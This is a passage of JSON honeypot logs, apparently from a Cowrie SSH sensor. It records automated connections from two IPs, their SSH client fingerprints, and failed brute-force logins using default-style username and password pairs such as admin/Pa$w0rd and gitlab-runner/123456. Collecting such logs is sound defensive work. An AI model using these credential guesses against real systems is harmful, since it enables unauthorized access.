ha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T22:11:11.829235Z","src_ip":"212.227.235.229","session":"ad79d3350f70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44760,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d722bea5334","protocol":"ssh","message":"New connection: 212.227.125.160:44760 (1.2.3.4:22) [session: 3d722bea5334]","sensor":"my-vps","timestamp":"2025-08-26T22:11:15.269381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:15.270144Z","src_ip":"212.227.125.160","session":"3d722bea5334"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:15.324738Z","src_ip":"212.227.125.160","session":"3d722bea5334"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar","message":"login attempt [sonar/sonar] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:15.482629Z","src_ip":"212.227.125.160","session":"3d722bea5334"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:16.584584Z","src_ip":"212.227.125.160","session":"3d722bea5334"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Pa$w0rd","message":"login attempt [admin/Pa$w0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:16.812745Z","src_ip":"212.227.235.229","session":"ad79d3350f70"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:18.452655Z","src_ip":"212.227.235.229","session":"ad79d3350f70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40144,"dst_ip":"1.2.3.4","dst_port":22,"session":"066919530929","protocol":"ssh","message":"New connection: 212.227.125.160:40144 (1.2.3.4:22) [session: 066919530929]","sensor":"my-vps","timestamp":"2025-08-26T22:11:20.648611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:20.809123Z","src_ip":"212.227.125.160","session":"066919530929"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:20.809919Z","src_ip":"212.227.125.160","session":"066919530929"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:21.142619Z","src_ip":"212.227.125.160","session":"066919530929"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:22.195063Z","src_ip":"212.227.125.160","session":"066919530929"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35532,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9c106dfca2f","protocol":"ssh","message":"New connection: 212.227.125.160:35532 (1.2.3.4:22) [session: d9c106dfca2f]","sensor":"my-vps","timestamp":"2025-08-26T22:11:25.920981Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:25.921714Z","src_ip":"212.227.125.160","session":"d9c106dfca2f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:25.976907Z","src_ip":"212.227.125.160","session":"d9c106dfca2f"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:26.131359Z","src_ip":"212.227.125.160","session":"d9c106dfca2f"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:27.253525Z","src_ip":"212.227.125.160","session":"d9c106dfca2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59152,"dst_ip":"1.2.3.4","dst_port":22,"session":"efc771fb2be1","protocol":"ssh","message":"New connection: 212.227.125.160:59152 (1.2.3.4:22) [session: efc771fb2be1]","sensor":"my-vps","timestamp":"2025-08-26T22:11:31.640546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:31.644075Z","src_ip":"212.227.125.160","session":"efc771fb2be1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:31.692005Z","src_ip":"212.227.125.160","session":"efc771fb2be1"}
{"eventid":"cowrie.login.failed","username":"hiddify-cli","password":"hiddify-cli","message":"login attempt [hiddify-cli/hiddify-cli] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:31.853698Z","src_ip":"212.227.125.160","session":"efc771fb2be1"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:32.901037Z","src_ip":"212.227.125.160","session":"efc771fb2be1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54542,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c04577b5c11","protocol":"ssh","message":"New connection: 212.227.125.160:54542 (1.2.3.4:22) [session: 5c04577b5c11]","sensor":"my-vps","timestamp":"2025-08-26T22:11:37.276737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:37.277459Z","src_ip":"212.227.125.160","session":"5c04577b5c11"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:37.322725Z","src_ip":"212.227.125.160","session":"5c04577b5c11"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"123456","message":"login attempt [gitlab-runner/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:37.462517Z","src_ip":"212.227.125.160","session":"5c04577b5c11"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:38.517940Z","src_ip":"212.227.125.160","session":"5c04577b5c11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49928,"dst_ip":"1.2.3.4","dst_port":22,"session":"24cac4e8c88e","protocol":"ssh","message":"New connection: 212.227.125.160:49928 (1.2.3.4:22) [session: 24cac4e8c88e]","sensor":"my-vps","timestamp":"2025-08-26T22:11:42.156148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:42.161992Z","src_ip":"212.227.125.160","session":"24cac4e8c88e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:42.211114Z","src_ip":"212.227.125.160","session":"24cac4e8c88e"}
{"eventid":"cowrie.login.failed","username":"basit","password":"basit","message":"login attempt [basit/basit] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:42.410187Z","src_ip":"212.227.125.160","session":"24cac4e8c88e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:43.469390Z","src_ip":"212.227.125.160","session":"24cac4e8c88e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45318,"dst_ip":"1.2.3.4","dst_port":22,"session":"f44e70365fa4","protocol":"ssh","message":"New connection: 212.227.125.160:45318 (1.2.3.4:22) [session: f44e70365fa4]","sensor":"my-vps","timestamp":"2025-08-26T22:11:47.615240Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:47.616862Z","src_ip":"212.227.125.160","session":"f44e70365fa4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:47.666443Z","src_ip":"212.227.125.160","session":"f44e70365fa4"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:47.917946Z","src_ip":"212.227.125.160","session":"f44e70365fa4"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:48.977389Z","src_ip":"212.227.125.160","session":"f44e70365fa4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40704,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2b31c865d0","protocol":"ssh","message":"New connection: 212.227.125.160:40704 (1.2.3.4:22) [session: 0f2b31c865d0]","sensor":"my-vps","timestamp":"2025-08-26T22:11:53.184067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:53.185608Z","src_ip":"212.227.125.160","session":"0f2b31c865d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:53.245717Z","src_ip":"212.227.125.160","session":"0f2b31c865d0"}
{"eventid":"cowrie.login.failed","username":"astra_user","password":"astra_user","message":"login attempt [astra_user/astra_user] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:53.381247Z","src_ip":"212.227.125.160","session":"0f2b31c865d0"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T22:11:54.451138Z","src_ip":"212.227.125.160","session":"0f2b31c865d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36090,"dst_ip":"1.2.3.4","dst_port":22,"session":"15efc626174a","protocol":"ssh","message":"New connection: 212.227.125.160:36090 (1.2.3.4:22) [session: 15efc626174a]","sensor":"my-vps","timestamp":"2025-08-26T22:11:58.894280Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:11:58.917404Z","src_ip":"212.227.125.160","session":"15efc626174a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T22:11:58.975012Z","src_ip":"212.227.125.160","session":"15efc626174a"}
{"eventid":"cowrie.login.failed","username":"mssql","password":"mssql","message":"login attempt [mssql/mssql] failed","sensor":"my-vps","timestamp":"2025-08-26T22:11:59.557577Z","src_ip":"212.227.125.160","session":"15efc626174a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36094,"dst_ip":"1.2.3.4","dst_port":22,"session":"70d1fcd0ed0a","protocol":"ssh","message":"New connection: 212.227.235.229:36094 (1.2.3.4:22) [session: 70d1fcd0ed0a]","sensor":"my-vps","timestamp":"2025-08-26T22:12:00.148031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T22:12:00.149204Z","src_ip":"212.227.235.229","session":"70d1fcd0ed0a"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ec